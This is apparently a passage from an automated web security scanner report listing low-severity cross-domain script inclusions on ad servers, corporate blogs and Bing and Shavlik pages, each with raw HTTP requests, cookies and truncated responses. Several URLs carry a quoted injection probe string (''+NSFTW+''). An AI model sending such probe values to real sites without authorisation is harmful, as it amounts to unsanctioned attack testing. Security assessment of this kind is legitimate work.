Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5812731941170583&output=html&h=90&slotname=4723656422&w=728&lmt=1301121447&flash=10.2.154&url=http%3A%2F%2Fwww.soundingsonline.com%2Farchives%2F%2BNSFTW%2B%3Fordering%3D%26searchphrase%3Dall&dt=1301103497608&bpp=1&shv=r20110315&jsv=r20110321-2&correlator=1301103497644&frm=0&adk=3965760877&ga_vid=1118154544.1301103498&ga_sid=1301103498&ga_hid=2034243247&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1426&bih=995&fu=0&ifi=1&dtd=1908&xpc=YNKBJ0Atab&p=http%3A//www.soundingsonline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mt_mop=5:1300987769|1:1300977498|10001:1297818481|10004:1299934992|11:1299460723|2:1299285586|3:1299090747|4:1299460679|9:1300624484; ts=1301103428; uuid=4d5b2371-3928-7a83-24fb-d52328f5624b

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 01:37:33 GMT
Last-Modified: Sat, 26 Mar 2011 01:37:33 GMT
x-mm-dbg: won
x-mm-host: ewr-bidder-x1, ewr-bidder-x2
Server: MMBD/3.5.0
Content-Length: 1238
Content-Type: text/html
Connection: keep-alive

<div width='1' height='1' style='display:none; overflow:hidden'><img style='left:-10px;top:-10px; position:absolute' src='http://pixel.mathtag.com/creative/img?mt_adid=70&mt_aid=54393751066380379&mt_e
...[SNIP]...
</div><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N553.mediamath/B5123370.3;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=54393751066380379&mt_id=109664&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=54393751066380379?">
</SCRIPT>
...[SNIP]...
21.6. http://bidder.mathtag.com/iframe/notify  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkphRFJpVVU5RVQzbFJWa3h3UlZsUlRIVnZObUZCL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MDg0MzUxNDk5NzUwODE2MS8xMDkxMzIvMTAyMDY1LzQvUWk0TlZFWk5SbHYyNzBhYklEZU9pek92X2JTNTJmTDMyQ3J1UW04QjBmWS8/ooeD-k-gx-6pGhT2kZ6UUsZVX08&price=TY1DQQAHHIgK5XGJfLlnh8zvfrJf91e2Op9Oyg&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBmMoTQUONTYi5HInjlQeHz-XlB9zvj_EB5PW9vBGErMGhDwAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAHg6pnsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gFMaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2FyY2hpdmVzLycrTlNGVFcrJz9vcmRlcmluZz0mc2VhcmNocGhyYXNlPWFsbJgCsBjAAgTIAtbBjA6oAwHoA8sD6AP0CPUDAAAAxIAGg5z-k4L07Phv%26num%3D1%26sig%3DAGiWqtyFJMD7LgLXSPFUBmEVhmb0cBGe0Q%26client%3Dca-pub-5812731941170583%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-5812731941170583&output=html&h=90&slotname=4723656422&w=728&lmt=1301121423&flash=10.2.154&url=http%3A%2F%2Fwww.soundingsonline.com%2Farchives%2F'%2BNSFTW%2B'%3Fordering%3D%26searchphrase%3Dall&dt=1301103472597&bpp=1&shv=r20110315&jsv=r20110321-2&correlator=1301103473670&frm=0&adk=3965760877&ga_vid=444046128.1301103474&ga_sid=1301103474&ga_hid=1149958600&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=995&fu=0&ifi=1&dtd=1077&xpc=hYA46mUL3p&p=http%3A//www.soundingsonline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mt_mop=5:1300987769|1:1300977498|10001:1297818481|10004:1299934992|11:1299460723|2:1299285586|3:1299090747|4:1299460679|9:1300624484; ts=1300988408; uuid=4d5b2371-3928-7a83-24fb-d52328f5624b

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 01:37:08 GMT
Last-Modified: Sat, 26 Mar 2011 01:37:08 GMT
x-mm-dbg: won
x-mm-host: ewr-bidder-x1, ewr-bidder-x2
Server: MMBD/3.5.0
Content-Length: 1230
Content-Type: text/html
Connection: keep-alive

<div width='1' height='1' style='display:none; overflow:hidden'><img style='left:-10px;top:-10px; position:absolute' src='http://pixel.mathtag.com/creative/img?mt_adid=70&mt_aid=60843514997508161&mt_e
...[SNIP]...
</div><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N553.mediamath/B5123370.43;sz=728x90;click1=http://pixel.mathtag.com/click/img?mt_aid=60843514997508161&mt_id=109132&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=60843514997508161?"></SCRIPT>
...[SNIP]...
21.7. http://blog.smartertools.com/archive/2011/02/23/from-sea-to-shining-sea-smartertools-committed-to-serving-its-international-customers.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.smartertools.com
Path:   /archive/2011/02/23/from-sea-to-shining-sea-smartertools-committed-to-serving-its-international-customers.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /archive/2011/02/23/from-sea-to-shining-sea-smartertools-committed-to-serving-its-international-customers.aspx HTTP/1.1
Host: blog.smartertools.com
Proxy-Connection: keep-alive
Referer: http://blog.smartertools.com/archive/2011/03/23/lessons-learned-from-gdc-2011.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=41510257.1300315555.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=134836083.1670938407.1300551915.1300554519.1301158717.3; __utmc=134836083; __utmb=134836083.5.10.1301158717; CommunityServer-LastVisitUpdated-2570=; CSAnonymous=fbcaba1a-cd13-42c9-82fb-4e53acda2ac4; CommunityServer-UserCookie2570=lv=Wed, 16 Mar 2011 15:45:59 GMT&mra=Sat, 26 Mar 2011 09:58:13 GMT; __utma=41510257.1575383479.1300315555.1300315555.1301158742.2; __utmc=41510257; __utmb=41510257.1.10.1301158742

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
CommunityServer: 3.1.31113.47
X-Pingback: http://blog.smartertools.com/pingback.aspx
Set-Cookie: CommunityServer-UserCookie2570=lv=Wed, 16 Mar 2011 15:45:59 GMT&mra=Sat, 26 Mar 2011 09:58:28 GMT; expires=Sun, 25-Mar-2012 16:58:28 GMT; path=/
Set-Cookie: CSAnonymous=fbcaba1a-cd13-42c9-82fb-4e53acda2ac4; expires=Sat, 26-Mar-2011 17:18:28 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:58:27 GMT
Content-Length: 27402


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</script> <script type="text/javascript" src="http://tweetmeme.com/i/scripts/button.js"></script>
...[SNIP]...
21.8. http://blog.smartertools.com/archive/2011/03/23/lessons-learned-from-gdc-2011.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blog.smartertools.com
Path:   /archive/2011/03/23/lessons-learned-from-gdc-2011.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /archive/2011/03/23/lessons-learned-from-gdc-2011.aspx HTTP/1.1
Host: blog.smartertools.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-UserCookie2570=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Wed, 16 Mar 2011 15:45:59 GMT; __utmz=41510257.1300315555.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41510257.1575383479.1300315555.1300315555.1300315555.1; __utmz=134836083.1300551915.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=134836083.1670938407.1300551915.1300554519.1301158717.3; __utmc=134836083; __utmb=134836083.5.10.1301158717

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
CommunityServer: 3.1.31113.47
X-Pingback: http://blog.smartertools.com/pingback.aspx
Set-Cookie: CommunityServer-UserCookie2570=lv=Wed, 16 Mar 2011 15:45:59 GMT&mra=Sat, 26 Mar 2011 09:58:13 GMT; expires=Sun, 25-Mar-2012 16:58:13 GMT; path=/
Set-Cookie: CSAnonymous=fbcaba1a-cd13-42c9-82fb-4e53acda2ac4; expires=Sat, 26-Mar-2011 17:18:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 16:58:12 GMT
Content-Length: 29521


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</script> <script type="text/javascript" src="http://tweetmeme.com/i/scripts/button.js"></script>
...[SNIP]...
21.9. http://cloudscan.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cloudscan.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: cloudscan.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 08 Dec 2010 17:51:00 GMT
Accept-Ranges: bytes
ETag: "09a3c79097cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 14:30:14 GMT
Content-Length: 1113

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="C
...[SNIP]...
</html>
<script language='javascript' src='https://a12.alphagodaddy.com/hosting_ads/gd01.js'></script>
21.10. https://feedback.discoverbing.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://feedback.discoverbing.com
Path:   /default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /default.aspx?mkt=en-us&productkey=binglocal&brand=&&locale=en-us&P1=footerlivelocal&P4=LIVE&P2=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110&P9=42.35596934774129/-71.05408050119877&searchtype=Local%20Search&backurl=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110&scrx=1 HTTP/1.1
Host: feedback.discoverbing.com
Connection: keep-alive
Referer: https://feedback.discoverbing.com/default.aspx?mkt=en-us&productkey=binglocal&brand=&&locale=en-us&P1=footerlivelocal&P4=LIVE&P2=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110&P9=42.35596934774129/-71.05408050119877&searchtype=Local%20Search&backurl=http%3A%2F%2Fwww.bing.com%2Fmaps%2F%3Fv%3D2%26cp%3D42.35596934774129~-71.05408050119877%26lvl%3D15%26dir%3D0%26sty%3Dr%26where1%3D02110%252C%2520MA%26q%3D02110
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: takemeback=takemeback=http%3a%2f%2fwww.bing.com%2fmaps%2f%3fv%3d2%26cp%3d42.35596934774129%7e-71.05408050119877%26lvl%3d15%26dir%3d0%26sty%3dr%26where1%3d02110%252C%2520MA%26q%3d02110; LNG=feedback.discoverbing.com=en-us; MSIDCookie=33f87e5c-7c8d-48b0-8858-d3cd02b35031

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 26 Mar 2011 01:00:06 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: takemeback=takemeback=http%3a%2f%2fwww.bing.com%2fmaps%2f%3fv%3d2%26cp%3d42.35596934774129%7e-71.05408050119877%26lvl%3d15%26dir%3d0%26sty%3dr%26where1%3d02110%252C%2520MA%26q%3d02110; expires=Sat, 26-Mar-2011 02:00:06 GMT; path=/
Set-Cookie: LNG=feedback.discoverbing.com=en-us; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: scrx=1; expires=Mon, 26-Mar-2012 01:00:06 GMT; path=/
Vary: Accept-Encoding
Content-Length: 26967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><hea
...[SNIP]...
</script><script type="text/javascript" defer="defer" src="https&#58;&#47;&#47;help.live.com&#47;resources&#47;neutral&#47;launchhelp.js&#63;3.19.6.0&#10;"></script>
...[SNIP]...
21.11. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098423&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.bluestarfibres.com_80.htm&dt=1301080423019&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080423111&frm=0&adk=1607234649&ga_vid=2006162341.1301080423&ga_sid=1301080423&ga_hid=800117673&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=995&fu=0&ifi=1&dtd=166&xpc=n6AlwetjOH&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 19:12:54 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 12353
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
21.12. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1301098157&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fwww.nutter.com_80.htm&dt=1301080156080&bpp=4&shv=r20110315&jsv=r20110321-2&correlator=1301080157132&frm=0&adk=1607234649&ga_vid=898506308.1301080157&ga_sid=1301080157&ga_hid=824163236&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1410&bih=995&fu=0&ifi=1&dtd=1080&xpc=9nAMVAsHm1&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Fri, 25 Mar 2011 19:08:29 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 4546
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
21.13. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /pagead/ads?client=ca-pub-5812731941170583&output=html&h=90&slotname=4723656422&w=728&lmt=1301117934&flash=10.2.154&url=http%3A%2F%2Fwww.soundingsonline.com%2Fboat-shop%2Fq-a-a&dt=1301099984483&bpp=1&shv=r20110315&jsv=r20110321-2&correlator=1301099984556&frm=0&adk=3965760877&ga_vid=693334650.1301099985&ga_sid=1301099985&ga_hid=1001098695&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1426&bih=952&ref=http%3A%2F%2Fwww.soundingsonline.com%2Farchives%2F'%2BNSFTW%2B'%3Fordering%3D%26searchphrase%3Dall&fu=0&ifi=1&dtd=92&xpc=c8T4opH8r5&p=http%3A//www.soundingsonline.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; __ar_v4=%7CTEDYGTRZH5DVRIBZAHSESJ%3A20110318%3A1%7CGUKQZOPGUBBXJAG5MGCY3C%3A20110318%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110318%3A1%7CSDUW4IOBWFCKJBD7TJN7TI%3A20110318%3A1; id=c708f553300004b|998766/320821/15055,1831140/746237/15055,2818894/957634/15036,578176/951462/15032|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Mar 2011 00:38:58 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
Content-Length: 2241
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/256163696/direct/01/1557190323?click=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBu_OooTWNTYPAMsrtlQfXjOGgCKbV2egBlofdphaero6XTgAQARgBIAA4AVCAx-HEBGDJBoIBF2NhLXB1Yi01ODEyNzMxOTQxMTcwNTgzoAGalLXsA7IBF3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tugEJNzI4eDkwX2FzyAEJ2gEuaHR0cDovL3d3dy5zb3VuZGluZ3NvbmxpbmUuY29tL2JvYXQtc2hvcC9xLWEtYZgC4h3AAgXIAtyH9gmoAwHoA8sD9QMAAADE%26num%3D1%26sig%3DAGiWqtyrwT5xP3OEAfvyZmG47Ddcr8uMNw%26client%3Dca-pub-5812731941170583%26adurl%3D">
</script>
...[SNIP]...
</noscript>
<script type="text/javascript" src="http://view.c3metrics.com/v.js?id=valueclick&cid=480&t=72"></script>
...[SNIP]...
21.14. http://learn.shavlik.com/shavlik/mail-list-patch-management-org.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/mail-list-patch-management-org.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shavlik/mail-list-patch-management-org.aspx HTTP/1.1
Host: learn.shavlik.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Fri, 25 Mar 2011 20:58:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.9-2
X-Pingback: http://www.oppsource.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 25 Mar 2011 20:58:53 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

   <script language = "javascript">
       window.location = 'http://learn.shavlik.com/shavlik/';
   </script>
   <script language = "javascript">
       window.location = 'http://learn.shavlik.com/shavlik/
...[SNIP]...
<link rel='stylesheet' id='A2A_SHARE_SAVE-css' href='http://www.oppsource.com/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.3' type='text/css' media='all' />
<script type='text/javascript' src='http://www.oppsource.com/wp-includes/js/jquery/jquery.js?ver=1.4.2'></script>
<script type='text/javascript' src='http://www.oppsource.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.1.1'></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.oppsource.com/wp-content/themes/oppsource3/style/superfish.css" media="screen">
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/jquery.js"></script>
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/hoverIntent.js"></script>
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/superfish.js"></script>
...[SNIP]...
21.15. http://learn.shavlik.com/shavlik/mail-list-remediator.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/mail-list-remediator.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shavlik/mail-list-remediator.aspx HTTP/1.1
Host: learn.shavlik.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Fri, 25 Mar 2011 20:58:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.9-2
X-Pingback: http://www.oppsource.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 25 Mar 2011 20:58:53 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

   <script language = "javascript">
       window.location = 'http://learn.shavlik.com/shavlik/';
   </script>
   <script language = "javascript">
       window.location = 'http://learn.shavlik.com/shavlik/
...[SNIP]...
<link rel='stylesheet' id='A2A_SHARE_SAVE-css' href='http://www.oppsource.com/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.3' type='text/css' media='all' />
<script type='text/javascript' src='http://www.oppsource.com/wp-includes/js/jquery/jquery.js?ver=1.4.2'></script>
<script type='text/javascript' src='http://www.oppsource.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.1.1'></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.oppsource.com/wp-content/themes/oppsource3/style/superfish.css" media="screen">
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/jquery.js"></script>
